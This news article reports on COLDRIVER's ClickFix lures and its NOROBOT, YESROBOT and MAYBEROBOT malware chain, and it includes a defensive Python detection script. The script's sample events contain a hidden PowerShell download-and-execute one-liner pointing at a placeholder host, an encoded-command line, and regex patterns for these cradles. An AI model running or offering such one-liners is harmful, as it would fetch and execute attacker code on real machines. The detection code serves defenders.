A Russia-linked hacking group known as COLDRIVER is showing signs of a heightened operations tempo, according to Google Threat Intelligence Group (GTIG). Since May 2025, the state-sponsored actor has rapidly refined and retooled its malware toolkit. This swift development began merely five days after the public disclosure of its previous information-stealing malware, LOSTKEYS. GTIG’s observation of this accelerated development suggests a sustained effort by the group to maintain its capabilities. While it’s unknown how long the newest malware families have been under development, GTIG has not seen a single instance of LOSTKEYS in the wild since its details were published.
The new malware collection, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, comprises a set of related families linked by a shared delivery chain. This activity marks a departure from COLDRIVER’s standard operating procedure, which typically focused on credential theft from high-profile individuals such as NGO staff, policy advisors, and dissidents. The new attacks leverage “ClickFix-style lures” to trick users into running malicious PowerShell commands through the Windows Run dialog, often under the guise of a fake CAPTCHA verification prompt. The earlier attack waves in January, March, and April 2025 had deployed the LOSTKEYS information stealer, but subsequent intrusions have led to the deployment of this new “ROBOT” family of malware.
The infection chain begins with an HTML ClickFix lure, dubbed COLDCOPY, which drops a DLL called NOROBOT. This DLL is then executed to drop the next-stage malware. Initial versions of this sophisticated attack distributed a Python backdoor named YESROBOT. This minimal backdoor used HTTPS to retrieve commands and only supported basic functions like file download/execution and retrieving specific documents. However, after only two observed deployments, the threat actors quickly switched to a more flexible PowerShell implant called MAYBEROBOT, which has greater capabilities, including the ability to run arbitrary commands and download payloads from a URL.
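The Run-dialog launch step of a ClickFix lure leaves a recognisable trace in endpoint telemetry: the user's shell (explorer.exe) spawns PowerShell with a download-and-execute one-liner. The following is an added detection example written for this article, not code from GTIG or from the campaign; it runs over constructed Sysmon-style process-creation records, and the field names, regex patterns and scoring threshold are assumptions.

```python
"""Flag ClickFix-style launches: PowerShell spawned by explorer.exe with
download-cradle, execute/encoded or stealth flags. Sample records below are
constructed for illustration, not real captures."""
import re

# Constructed process-creation records (Sysmon Event ID 1 style field names).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iwr http://example.invalid/a | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -enc SQBFAFgA"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",   # benign build task
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File .\\build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Assumed indicator patterns; tune to your environment.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXEC_FLAG = re.compile(
    r"\b(iex|invoke-expression)\b|(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)
STEALTH_FLAG = re.compile(
    r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b|(?:^|\s)-(?:nop|noprofile)\b"
    r"|(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", re.I)

def clickfix_indicators(event):
    """Return the indicator names a process-creation event matches."""
    hits = []
    image = event["image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return hits                      # only PowerShell launches are scored
    if event["parent"].lower().endswith("\\explorer.exe"):
        hits.append("shell-spawned")     # Run dialog / double-click parentage
    cmd = event["cmdline"]
    if DOWNLOAD_CRADLE.search(cmd): hits.append("download-cradle")
    if EXEC_FLAG.search(cmd): hits.append("exec-or-encoded")
    if STEALTH_FLAG.search(cmd): hits.append("stealth-flags")
    return hits

def is_suspected_clickfix(event):
    """Shell-spawned PowerShell plus at least one further indicator."""
    hits = clickfix_indicators(event)
    return "shell-spawned" in hits and len(hits) >= 2

def triage(events):
    """Command lines of events worth an analyst's attention."""
    return [e["cmdline"] for e in events if is_suspected_clickfix(e)]
```

The parent-process requirement keeps ordinary PowerShell use (an IDE build task, a scheduled script) from firing; pair this with a RunMRU registry review on flagged hosts.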
It’s believed that the COLDRIVER actors rushed to deploy the simpler YESROBOT as a “stopgap mechanism” immediately following the LOSTKEYS disclosure. They soon abandoned it in favor of the more robust MAYBEROBOT. The earliest version of NOROBOT also included a step to download a full Python 3.8 installation, a “noisy” artifact that would easily raise suspicion, which further supports the theory of a rushed initial deployment followed by rapid refinement. Google posits that the use of NOROBOT and MAYBEROBOT is likely reserved for the group’s most significant targets, who may have already been compromised via phishing, for the end goal of gathering additional intelligence from their devices.
This constant evolution, in which the malware was first simplified and later made more complex again by splitting the cryptography keys, highlights the group’s concerted effort to keep its delivery mechanism ahead of detection systems. The goal remains consistent: continued intelligence collection against high-value targets. This disclosure comes as the Netherlands’ Public Prosecution Service (OM) announced that three 17-year-old men are suspected of providing services to a foreign government. One of the suspects is alleged to have been in contact with a hacker group affiliated with the Russian government and to have instructed the others to map Wi-Fi networks in The Hague. The information collected was shared with the client for a fee, and the OM believes it could be used for digital espionage and cyber attacks.